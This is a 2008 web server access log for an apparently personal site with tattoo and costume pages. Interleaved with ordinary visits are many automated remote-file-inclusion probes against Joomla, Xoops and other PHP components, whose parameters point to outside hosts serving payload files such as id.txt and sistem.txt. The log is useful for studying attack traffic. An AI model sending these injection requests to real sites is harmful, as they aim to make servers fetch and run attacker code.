82.194.71.79 - - [11/Jun/2008:14:08:05 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
82.194.71.79 - - [11/Jun/2008:14:08:05 -0500] "GET //index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.221.179.200 - - [11/Jun/2008:14:08:56 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
206.221.179.200 - - [11/Jun/2008:14:08:56 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
66.7.207.104 - - [11/Jun/2008:14:09:54 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
66.7.207.104 - - [11/Jun/2008:14:09:55 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
211.115.213.236 - - [11/Jun/2008:14:17:48 -0500] "GET /logs/access_log.1208649600/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.115.213.236 - - [11/Jun/2008:14:17:49 -0500] "GET /index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.115.213.236 - - [11/Jun/2008:14:17:49 -0500] "GET /logs/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
82.194.71.79 - - [11/Jun/2008:14:21:22 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
82.194.71.79 - - [11/Jun/2008:14:21:22 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
66.98.224.22 - - [11/Jun/2008:14:23:49 -0500] "GET /logs/access_log.1208649600//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.98.224.22 - - [11/Jun/2008:14:23:49 -0500] "GET //errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.98.224.22 - - [11/Jun/2008:14:23:50 -0500] "GET /logs//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
62.141.56.36 - - [11/Jun/2008:14:23:57 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:14:23:57 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
219.94.129.31 - - [11/Jun/2008:14:24:29 -0500] "GET /logs//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
219.94.129.31 - - [11/Jun/2008:14:24:30 -0500] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
66.98.224.22 - - [11/Jun/2008:14:24:42 -0500] "GET /logs/access_log.1208649600//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.98.224.22 - - [11/Jun/2008:14:24:42 -0500] "GET //errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.98.224.22 - - [11/Jun/2008:14:24:42 -0500] "GET /logs//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
203.72.181.15 - - [11/Jun/2008:14:27:29 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
203.72.181.15 - - [11/Jun/2008:14:27:29 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
190.54.28.163 - - [11/Jun/2008:14:29:02 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.54.28.163 - - [11/Jun/2008:14:29:10 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.45.133.3 - - [11/Jun/2008:14:34:52 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.0" 404 287 "-""libwww-perl/5.805"
202.45.133.3 - - [11/Jun/2008:14:34:52 -0500] "GET //index.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.0" 404 282 "-""libwww-perl/5.805"
81.169.129.21 - - [11/Jun/2008:14:35:29 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/pid.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
81.169.129.21 - - [11/Jun/2008:14:35:29 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/pid.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
74.6.28.101 - - [11/Jun/2008:14:35:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [11/Jun/2008:14:35:47 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.118.88.84 - - [11/Jun/2008:14:38:12 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.118.88.84 - - [11/Jun/2008:14:38:12 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
202.179.180.56 - - [11/Jun/2008:14:40:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.56 - - [11/Jun/2008:14:40:17 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
160.99.12.231 - - [11/Jun/2008:14:41:22 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
160.99.12.231 - - [11/Jun/2008:14:41:23 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
192.211.25.9 - - [11/Jun/2008:14:43:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
192.211.25.9 - - [11/Jun/2008:14:43:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
192.211.25.9 - - [11/Jun/2008:14:43:33 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
192.211.25.9 - - [11/Jun/2008:14:43:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.174.79.237 - - [11/Jun/2008:14:44:17 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.174.79.237 - - [11/Jun/2008:14:44:18 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.174.79.237 - - [11/Jun/2008:14:44:18 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.174.79.237 - - [11/Jun/2008:14:44:18 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.174.79.237 - - [11/Jun/2008:14:44:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.174.79.237 - - [11/Jun/2008:14:44:58 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.106.101.24 - - [11/Jun/2008:14:47:51 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:14:47:52 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:14:48:11 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.106.101.24 - - [11/Jun/2008:14:48:11 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.102.94.71 - - [11/Jun/2008:14:48:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.106.98.71 - - [11/Jun/2008:14:48:26 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.102.94.71 - - [11/Jun/2008:14:48:27 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.102.94.71 - - [11/Jun/2008:14:48:27 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.106.98.71 - - [11/Jun/2008:14:48:27 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.6.22.89 - - [11/Jun/2008:14:48:50 -0500] "GET /logs/access_log.1172016000 HTTP/1.0" 200 112661 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.230.197.245 - - [11/Jun/2008:14:50:04 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
66.230.197.245 - - [11/Jun/2008:14:50:04 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
160.99.12.231 - - [11/Jun/2008:14:51:28 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
160.99.12.231 - - [11/Jun/2008:14:51:28 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
89.108.64.152 - - [11/Jun/2008:14:51:39 -0500] "GET /logs//include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
89.108.64.152 - - [11/Jun/2008:14:51:39 -0500] "GET //include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
62.141.56.36 - - [11/Jun/2008:14:53:36 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:14:53:36 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:14:53:36 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
160.99.12.231 - - [11/Jun/2008:14:53:39 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
160.99.12.231 - - [11/Jun/2008:14:53:39 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:14:53:54 -0500] "GET /logs/access_log.1208649600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
210.48.67.39 - - [11/Jun/2008:14:55:04 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.48.67.39 - - [11/Jun/2008:14:55:04 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.53.240.146 - - [11/Jun/2008:14:58:37 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.53.240.146 - - [11/Jun/2008:14:58:38 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
202.221.143.111 - - [11/Jun/2008:15:02:31 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
202.221.143.111 - - [11/Jun/2008:15:02:32 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
64.185.237.149 - - [11/Jun/2008:15:03:03 -0500] "GET /database.php?mosConfig_absolute_path=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.6.22.89 - - [11/Jun/2008:15:03:37 -0500] "GET /logs/access_log.1159401600 HTTP/1.0" 200 313298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
206.221.179.200 - - [11/Jun/2008:15:06:31 -0500] "GET //errors.php?error=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
71.234.229.25 - - [11/Jun/2008:15:08:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:08:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:08:17 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:08:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:08:22 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
62.141.56.36 - - [11/Jun/2008:15:09:09 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:15:09:10 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:15:09:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
62.141.56.36 - - [11/Jun/2008:15:09:28 -0500] "GET /logs/access_log.1208649600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
71.234.229.25 - - [11/Jun/2008:15:09:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:39 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:40 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:44 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:44 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:44 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:44 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:45 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:53 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:53 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:53 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:53 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:54 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:54 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:54 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:54 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
71.234.229.25 - - [11/Jun/2008:15:09:54 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Media Center PC 5.0)"
